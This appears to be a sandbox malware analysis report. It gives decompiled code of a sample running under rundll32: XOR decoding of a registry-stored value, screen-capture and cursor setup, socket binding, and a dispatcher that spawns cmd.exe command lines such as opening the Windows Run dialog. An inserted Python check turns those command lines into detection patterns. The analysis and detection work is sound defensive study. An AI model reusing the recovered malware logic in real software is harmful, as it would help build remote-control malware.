                                                            			E0464AE80(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				int _v616;
                                                            				int _v620;
                                                            				signed int _t25;
                                                            				int _t52;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				char* _t64;
                                                            				signed int _t65;
                                                            
                                                            				_t60 = __edi;
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				_t64 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x190);
                                                            				_v616 = 0x190;
                                                            				E04646050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(0, _t64, 0, _v616);
                                                            				_v612 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L8:
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "3", 0,  &_v620, _t64,  &_v616);
                                                            					_t62 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t71 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t52 = _v616;
                                                            						if(_t52 > 1) {
                                                            							_t55 = _t52 - 1;
                                                            							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                            							_t56 = _t55 - 1;
                                                            							while(_t56 != 0) {
                                                            								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                            								_t56 = _t56 - 1;
                                                            							}
                                                            							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t65);
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x0464ae80, 0x0464ae89, 0x0464ae90, 0x0464ae9b, 0x0464aea0, 0x0464aea8, 0x0464aeb7, 0x0464aecc, 0x0464aedc, 0x0464aee4, 0x0464af0b, 0x0464af86, 0x0464af98, 0x0464af0d, 0x0464af28, 0x0464af3b, 0x0464af3e, 0x0464af44, 0x0464af46, 0x00000000, 0x0464af48, 0x0464af48, 0x0464af50, 0x0464af54, 0x0464af55, 0x0464af58, 0x0464af5a, 0x0464af64, 0x0464af67, 0x0464af67, 0x0464af71, 0x0464af71, 0x0464af85, 0x0464af85, 0x0464af46

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AECC
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0464AF03
                                                            • RegQueryValueExW.ADVAPI32(?,0467E120,00000000,?,?,?), ref: 0464AF28
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464AF3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-1865207932
                                                            • Opcode ID: 61152c37767772e82a330f340e47f9eb5593bb1614755cfc77be5c5f0e05fb34
                                                            • Instruction ID: d43188876c7699577a821851ad724f62b504fb12120125dab8c09c5662d03384
                                                            • Opcode Fuzzy Hash: 61152c37767772e82a330f340e47f9eb5593bb1614755cfc77be5c5f0e05fb34
                                                            • Instruction Fuzzy Hash: 2931EC716052586FDB20DF74DC48AEEBBBDEF85304F5001DDE5099A102F6325944CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0464AFA0(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				int _v616;
                                                            				int _v620;
                                                            				signed int _t25;
                                                            				int _t52;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				char* _t64;
                                                            				signed int _t65;
                                                            
                                                            				_t60 = __edi;
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				_t64 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x190);
                                                            				_v616 = 0x190;
                                                            				E04646050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(0, _t64, 0, _v616);
                                                            				_v612 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L8:
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "2", 0,  &_v620, _t64,  &_v616);
                                                            					_t62 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t71 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t52 = _v616;
                                                            						if(_t52 > 1) {
                                                            							_t55 = _t52 - 1;
                                                            							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                            							_t56 = _t55 - 1;
                                                            							while(_t56 != 0) {
                                                            								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                            								_t56 = _t56 - 1;
                                                            							}
                                                            							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t65);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AFEC
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0464B023
                                                            • RegQueryValueExW.ADVAPI32(?,0467E124,00000000,?,?,?), ref: 0464B048
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464B05E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-1865207932
                                                            • Opcode ID: e338163b0c84330de068907c6a4f2f41b562dc7edbf0b064ab392dfa655c10f1
                                                            • Instruction ID: eef0195022fae033b8c18e1ebd746613a0687276c7da4c8e9282de9bc11442ba
                                                            • Opcode Fuzzy Hash: e338163b0c84330de068907c6a4f2f41b562dc7edbf0b064ab392dfa655c10f1
                                                            • Instruction Fuzzy Hash: 9331D8316042589BDB20DF74DC88EEEBBBDEF89704F5001EDD5099A102FA32AA44CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E04641A30(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				void* _v84;
                                                            				char _v88;
                                                            				intOrPtr _v92;
                                                            				char _v96;
                                                            				signed int _t29;
                                                            				intOrPtr _t31;
                                                            				void* _t32;
                                                            				struct HICON__* _t34;
                                                            				intOrPtr _t36;
                                                            				intOrPtr _t39;
                                                            				intOrPtr* _t45;
                                                            				struct HICON__** _t51;
                                                            				signed int _t53;
                                                            				signed int _t55;
                                                            
                                                            				_t29 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t29 ^ _t55;
                                                            				_t31 = _a4;
                                                            				_t45 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t31;
                                                            				 *((intOrPtr*)(_t31 + 0x38)) = __ecx;
                                                            				_t32 = CreateEventW(0, 1, 0, 0);
                                                            				asm("movaps xmm0, [0x467f950]");
                                                            				_t51 = _t45 + 0x70;
                                                            				asm("movups [ebp-0x4c], xmm0");
                                                            				_t53 = 0;
                                                            				 *(_t45 + 8) = _t32;
                                                            				asm("movaps xmm0, [0x467f940]");
                                                            				asm("movups [ebp-0x3c], xmm0");
                                                            				 *_t45 = 0x467eca4;
                                                            				asm("movaps xmm0, [0x467f930]");
                                                            				asm("movups [ebp-0x2c], xmm0");
                                                            				 *((intOrPtr*)(_t45 + 0x2c)) = 0x467ec9c;
                                                            				asm("movaps xmm0, [0x467f920]");
                                                            				asm("movups [ebp-0x1c], xmm0");
                                                            				do {
                                                            					 *(_t51 - 0x40) =  *(_t55 + _t53 * 4 - 0x4c);
                                                            					_t34 = LoadCursorW(0,  *(_t55 + _t53 * 4 - 0x4c));
                                                            					_t53 = _t53 + 1;
                                                            					 *_t51 = _t34;
                                                            					_t51 =  &(_t51[1]);
                                                            					_t58 = _t53 - 0x10;
                                                            				} while (_t53 < 0x10);
                                                            				 *((char*)(_t45 + 0x18)) = 2;
                                                            				 *((intOrPtr*)(_t45 + 0x20)) = 0x20;
                                                            				_t36 = L046423F0(_t45, L04655B14(_t53, _t58, 0x108), _t51, _t53, 0x20, 0);
                                                            				asm("movsd xmm0, [0x467f918]");
                                                            				 *((intOrPtr*)(_t45 + 0xb0)) = _t36;
                                                            				 *((char*)(_t45 + 0xc)) = 1;
                                                            				 *(_t45 + 0x14) = 0;
                                                            				 *(_t45 + 0x10) = 0;
                                                            				 *(_t45 + 0x1c) = 0;
                                                            				asm("movsd [ebx+0xb8], xmm0");
                                                            				_v96 = E04642050;
                                                            				_v92 = _t45;
                                                            				_v88 = 1;
                                                            				_v84 = CreateEventW(0, 0, 0, 0);
                                                            				_t39 = E0465F897(_t35, 0, 0, E04645400,  &_v96, 0, 0);
                                                            				WaitForSingleObject(_v84, 0xffffffff);
                                                            				CloseHandle(_v84);
                                                            				 *((intOrPtr*)(_t45 + 0x24)) = _t39;
                                                            				return E04655AFE(_v12 ^ _t55);
                                                            			}

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04641A5C
                                                            • LoadCursorW.USER32(00000000,?), ref: 04641AAD
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000020,00000000,00000108), ref: 04641B23
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04641B4C
                                                            • CloseHandle.KERNEL32(?), ref: 04641B55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseCursorHandleLoadObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3220371329-3916222277
                                                            • Opcode ID: 7727b41ea09234744f8884c751fd12441e028f7efc15b7bf5360683bf6c70e10
                                                            • Instruction ID: 947de241d74baaa4896a2632a7ca707ede76a944ff3d884034c3bd6c0a7eea6c
                                                            • Opcode Fuzzy Hash: 7727b41ea09234744f8884c751fd12441e028f7efc15b7bf5360683bf6c70e10
                                                            • Instruction Fuzzy Hash: 9541C771E40344EBEB058FA8DC89B9ABBB0FF14704F105259ED046F196FBB5A884CB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E04641C30(intOrPtr __ecx, intOrPtr _a4) {
                                                            				void* _v20;
                                                            				char _v24;
                                                            				intOrPtr _v28;
                                                            				char _v32;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t23;
                                                            				void* _t36;
                                                            				int _t38;
                                                            				intOrPtr _t42;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t49;
                                                            				void* _t51;
                                                            
                                                            				_push(_t51);
                                                            				_t49 = __ecx;
                                                            				 *((char*)(__ecx + 0xc)) = 0;
                                                            				WaitForSingleObject( *(__ecx + 0x24), 0xffffffff);
                                                            				CloseHandle( *(_t49 + 0x24));
                                                            				_t45 =  *((intOrPtr*)(_t49 + 0xb0));
                                                            				_t59 = _t45;
                                                            				if(_t45 != 0) {
                                                            					 *((intOrPtr*)( *_t45))(1);
                                                            				}
                                                            				_t42 = _a4;
                                                            				_t23 = L04655B14(_t51, _t59, 0x108);
                                                            				if(_t42 != 3) {
                                                            					__eflags = _t42 - 7;
                                                            					if(_t42 != 7) {
                                                            						_push(0);
                                                            						_push(_t42);
                                                            					} else {
                                                            						_push(1);
                                                            						_push(8);
                                                            					}
                                                            				} else {
                                                            					_push(1);
                                                            					_push(4);
                                                            				}
                                                            				 *((intOrPtr*)(_t49 + 0xb0)) = L046423F0(_t42, _t23, _t49, _t51);
                                                            				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 4,  *(_t49 + 0x18) & 0x000000ff);
                                                            				_t30 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 0x10,  ==  ? 0xcc0020 : 0x40cc0020);
                                                            				 *((intOrPtr*)(_t49 + 0x20)) = _t42;
                                                            				 *((char*)(_t49 + 0xc)) = 1;
                                                            				_v32 = E04642050;
                                                            				_v28 = _t49;
                                                            				_v24 = 1;
                                                            				_v20 = CreateEventW(0, 0, 0, 0);
                                                            				_t36 = E0465F897(0xcc0020, 0, 0, E04645400,  &_v32, 0, 0);
                                                            				WaitForSingleObject(_v20, 0xffffffff);
                                                            				_t38 = CloseHandle(_v20);
                                                            				 *(_t49 + 0x24) = _t36;
                                                            				return _t38;
                                                            			}

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04641C47
                                                            • CloseHandle.KERNEL32(?), ref: 04641C50
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04641CAE
                                                            • InterlockedExchange.KERNEL32(?,40CC0020), ref: 04641CCC
                                                            • CreateEventW.KERNEL32 ref: 04641CEE
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04641D1A
                                                            • CloseHandle.KERNEL32(?), ref: 04641D24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CreateEvent
                                                            • String ID:
                                                            • API String ID: 939225815-0
                                                            • Opcode ID: 6595f0d4fe0916082f8446d6d8956eefb563564faf62022ced90fa98f438b550
                                                            • Instruction ID: 6572a7197988c86ccc6b8dc2fd16d2b048c5a4766160c77c0bebdc3dc5866781
                                                            • Opcode Fuzzy Hash: 6595f0d4fe0916082f8446d6d8956eefb563564faf62022ced90fa98f438b550
                                                            • Instruction Fuzzy Hash: 7731F2B1344301BFEB049B69CC49B5ABBE4FF49724F100219F6599B2C1EBB5B8508B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E04636C00(void* __ebx, void* __ecx, void* __edi, void* __esi, signed char _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				short _v532;
                                                            				char _v548;
                                                            				signed int _t15;
                                                            				signed int _t17;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t33;
                                                            				signed int _t35;
                                                            				signed int _t37;
                                                            
                                                            				_t27 = __ecx;
                                                            				_t26 = __ebx;
                                                            				_t37 = (_t35 & 0xfffffff8) - 0x224;
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t37;
                                                            				_t17 = _a4 & 0x000000ff;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_t33 = __ecx;
                                                            				asm("movups [esp+0x8], xmm0");
                                                            				if(_t17 > 7) {
                                                            					L10:
                                                            					return E04655AFE(_v8 ^ _t37);
                                                            				} else {
                                                            					switch( *((intOrPtr*)(_t17 * 4 +  &M04636CF4))) {
                                                            						case 0:
                                                            							GetWindowsDirectoryW( &_v532, 0x104);
                                                            							lstrcatW( &_v532, L"\\explorer.exe");
                                                            							goto L9;
                                                            						case 1:
                                                             							_push(L"cmd.exe /c rundll32.exe shell32.dll,#61"); // shell32.dll export #61 is RunFileDlg, i.e. the "Run" dialog
                                                            							goto L8;
                                                            						case 2:
                                                            							__eax = E04636880(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 3:
                                                            							__eax = E04636960(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 4:
                                                            							__eax = E04636A40(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 5:
                                                            							goto L10;
                                                            						case 6:
                                                            							_push(L"cmd.exe /c start iexplore.exe");
                                                            							L8:
                                                             							 &_v532 = lstrcpyW( &_v532, ??); // "??" is the string pushed by case 1 or case 6; the decompiler did not carry it across the label, and the "&_v532 =" assignment is its artifact
                                                            							L9:
                                                            							_push( &_v548);
                                                            							_push( &_v532);
                                                            							_push(_t27);
                                                             							E046472E0(_t26,  *((intOrPtr*)(_t33 + 0x70)), _t39); // receives the command line built above in _v532; its body is not shown on this page
                                                            							_t37 = _t37 - 8 + 0x14;
                                                            							goto L10;
                                                            					}
                                                            				}
                                                            				L11:
                                                            			}














Address gutter of the E04636C00 listing above (one address per decompiled line, in listing order; 0x00000000 marks label and goto lines with no instruction): 0x04636c00, 0x04636c00, 0x04636c06, 0x04636c0c, 0x04636c13, 0x04636c1a, 0x04636c1e, 0x04636c22, 0x04636c24, 0x04636c2c, 0x04636cdc, 0x04636cee, 0x04636c32, 0x04636c32, 0x00000000, 0x04636c43, 0x04636c53, 0x00000000, 0x00000000, 0x04636c5b, 0x00000000, 0x00000000, 0x04636c63, 0x04636c68, 0x04636c69, 0x04636c70, 0x04636c70, 0x04636c7a, 0x00000000, 0x00000000, 0x04636c7e, 0x04636c83, 0x04636c84, 0x04636c8b, 0x04636c8b, 0x04636c95, 0x00000000, 0x00000000, 0x04636c99, 0x04636c9e, 0x04636c9f, 0x04636ca6, 0x04636ca6, 0x04636cb0, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x04636cb3, 0x04636cb8, 0x04636cbd, 0x04636cc3, 0x04636cca, 0x04636cd2, 0x04636cd3, 0x04636cd4, 0x04636cd9, 0x00000000, 0x00000000, 0x04636c32, 0x00000000

                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 04636C43
                                                            • lstrcatW.KERNEL32(?,\explorer.exe), ref: 04636C53
                                                            • lstrcpyW.KERNEL32(?,cmd.exe /c rundll32.exe shell32.dll,#61), ref: 04636CBD
                                                            Strings
                                                            • \explorer.exe, xrefs: 04636C49
                                                            • cmd.exe /c start iexplore.exe, xrefs: 04636CB3
                                                            • cmd.exe /c rundll32.exe shell32.dll,#61, xrefs: 04636C5B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DirectoryWindowslstrcatlstrcpy
                                                            • String ID: \explorer.exe$cmd.exe /c rundll32.exe shell32.dll,#61$cmd.exe /c start iexplore.exe
                                                            • API String ID: 4189314281-3733130215
                                                            • Opcode ID: 038586f3b069b1dcfb2065dae64fedccd6c56502bfb1b1b055a7dac4df32f47c
                                                            • Instruction ID: 1b40bb89a7d464920cc7f16a17aa48e19041432eba85ae2a883793ec433bfcd1
                                                            • Opcode Fuzzy Hash: 038586f3b069b1dcfb2065dae64fedccd6c56502bfb1b1b055a7dac4df32f47c
                                                            • Instruction Fuzzy Hash: 1421D5B2514244BBC234FB74E88D8ABB3D8EF58315F004A1EF94686191FA75B550C7DA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
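The switch in E04636C00 above is a small command dispatcher: the low byte of the argument selects either a fixed command line to launch (case 0 builds %WINDIR%\explorer.exe, cases 1 and 6 use the two cmd.exe strings from the Strings list) or one of three handler functions (cases 2 to 4), and ids 5 and above 7 fall straight through to the epilogue. Ordinal 61 of shell32.dll is RunFileDlg, the "Run" dialog. The following is an added example, not code from the report or from the sample: it models that table in Python and turns the two distinctive command lines into a process-creation check. The event records are constructed, Sysmon-style dictionaries with Image and CommandLine fields, and the default windir value is an assumption.

```python
"""Model of the E04636C00 command dispatcher and a process-creation check
derived from its fixed command lines.

Added example: not code from the report or from the sample.  The event
records are constructed, Sysmon-style dictionaries; the default windir is an
assumption.
"""
import ntpath

# Jump table recovered from the switch in E04636C00 (index = low byte of _a4).
# Cases 2-4 dispatch to handlers whose bodies are not on this page; case 5
# returns without doing anything; case 7 has a jump-table slot that the
# decompiler did not render, so its behaviour is unknown here.
COMMAND_LINES = {
    0: r"{windir}\explorer.exe",                    # GetWindowsDirectoryW + lstrcatW
    1: "cmd.exe /c rundll32.exe shell32.dll,#61",   # shell32 ordinal 61 = RunFileDlg
    6: "cmd.exe /c start iexplore.exe",
}
HANDLERS = {2: "E04636880", 3: "E04636960", 4: "E04636A40"}


def dispatch(cmd_id, windir=r"C:\Windows"):
    """Return (action, detail) for a command id, following the decompiled control flow."""
    cmd_id &= 0xFF                 # _t17 = _a4 & 0x000000ff
    if cmd_id > 7 or cmd_id == 5:  # straight to the epilogue (L10)
        return ("noop", None)
    if cmd_id == 7:
        return ("unknown", None)
    if cmd_id in HANDLERS:
        return ("call", HANDLERS[cmd_id])
    return ("spawn", COMMAND_LINES[cmd_id].format(windir=windir))


def normalize(cmdline):
    """Lower-case and collapse whitespace so trivial variations still match."""
    return " ".join(cmdline.lower().split())


# The two cmd.exe command lines are distinctive enough to match on their own.
# A bare explorer.exe launch (case 0) is only a weak signal: a normal logon
# looks the same, and the report does not show the parent process here, so it
# is reported with low confidence.
SIGNATURES = [
    (1, "high", normalize(COMMAND_LINES[1])),
    (6, "high", normalize(COMMAND_LINES[6])),
]


def match_event(event):
    """Return (case_id, confidence) if a process-creation event matches the dispatcher, else None."""
    cl = normalize(event["CommandLine"])
    for case_id, confidence, needle in SIGNATURES:
        if needle in cl:
            return (case_id, confidence)
    image = ntpath.basename(event["Image"]).lower()
    if image == "explorer.exe" and cl.endswith("\\explorer.exe"):
        return (0, "low")
    return None


def scan(events):
    """Index every matching event in a list of process-creation records."""
    hits = []
    for i, event in enumerate(events):
        m = match_event(event)
        if m:
            hits.append((i, m))
    return hits


# Constructed sample events (Sysmon EventID 1 style fields), not from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c rundll32.exe shell32.dll,#61"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe  /C start IEXPLORE.EXE"},
    {"Image": r"C:\Windows\explorer.exe",     "CommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for cmd_id in range(9):
        print(cmd_id, dispatch(cmd_id))
    print(scan(SAMPLE_EVENTS))
```

The check deliberately keys on the exact strings the dispatcher embeds rather than on cmd.exe or rundll32.exe in general; a bare explorer.exe launch is only worth flagging once parent-process context is available, which this part of the report does not provide.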

                                                            C-Code - Quality: 90%
                                                            			E04652220(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t23;
                                                            				long _t24;
                                                            				void* _t27;
                                                            				long _t32;
                                                            				intOrPtr* _t41;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            
                                                            				_t41 = __ecx;
                                                            				if( *((intOrPtr*)( *__ecx + 0x118))() == 0) {
                                                            					L10:
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x174);
                                                            					if( *(__ecx + 0x54) != 3) {
                                                            						 *((intOrPtr*)(__ecx + 0x58)) = 1;
                                                             						SetLastError(0x139f); // ERROR_INVALID_STATE (5023): the object is not in state 3
                                                            						 *(_t41 + 0x174) = 0;
                                                            						goto L10;
                                                            					} else {
                                                            						 *(__ecx + 0x54) = 0;
                                                            						 *(__ecx + 0x174) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0x11c))();
                                                            						_t23 = L046523F0(__ebx, __ecx, __ecx, _t42, _a4);
                                                            						_t43 = GetLastError;
                                                            						if(_t23 == 0) {
                                                            							L8:
                                                            							_t24 = GetLastError();
                                                            							 *((intOrPtr*)( *_t41))();
                                                            							SetLastError(_t24);
                                                            							return 0;
                                                            						} else {
                                                             							_t27 = CreateIoCompletionPort(0xffffffff, 0, 0, 0); // INVALID_HANDLE_VALUE with no existing port: create a new completion port
                                                            							 *(_t41 + 0x50) = _t27;
                                                            							if(_t27 == 0) {
                                                            								_t32 = GetLastError();
                                                            								 *((intOrPtr*)(_t41 + 0x58)) = 7;
                                                            								SetLastError(_t32);
                                                            							}
                                                            							if( *(_t41 + 0x50) == 0 || E04652510(_t41, _t41, _t43) == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t41 + 0x4c)) = _a8;
                                                            								 *((intOrPtr*)(_t41 + 0x54)) = 1;
                                                            								ResetEvent( *(_t41 + 0x3c));
                                                            								return 1;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}












Address gutter of the E04652220 listing above (one address per decompiled line, in listing order; 0x00000000 marks goto lines with no instruction): 0x04652225, 0x04652231, 0x04652308, 0x0465230c, 0x04652237, 0x0465223d, 0x04652246, 0x046522f0, 0x046522f7, 0x046522fd, 0x00000000, 0x0465224c, 0x0465224c, 0x04652255, 0x04652261, 0x0465226c, 0x04652271, 0x04652279, 0x046522d2, 0x046522d2, 0x046522da, 0x046522dd, 0x046522e8, 0x0465227b, 0x04652283, 0x04652289, 0x0465228e, 0x04652290, 0x04652293, 0x0465229a, 0x0465229a, 0x046522a4, 0x00000000, 0x046522b1, 0x046522b7, 0x046522ba, 0x046522c1, 0x046522cf, 0x046522cf, 0x046522a4, 0x04652279, 0x04652246

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 046522F7
                                                              • Part of subcall function 046523F0: socket.WS2_32(?,00000001,00000006), ref: 04652459
                                                              • Part of subcall function 046523F0: bind.WS2_32(00000000,00000002,0000001C), ref: 0465247E
                                                              • Part of subcall function 046523F0: closesocket.WS2_32(00000000), ref: 046524B4
                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?), ref: 04652283
                                                            • GetLastError.KERNEL32 ref: 04652290
                                                            • SetLastError.KERNEL32(00000000), ref: 0465229A
                                                            • ResetEvent.KERNEL32(?), ref: 046522C1
                                                            • GetLastError.KERNEL32(?), ref: 046522D2
                                                            • SetLastError.KERNEL32(00000000), ref: 046522DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
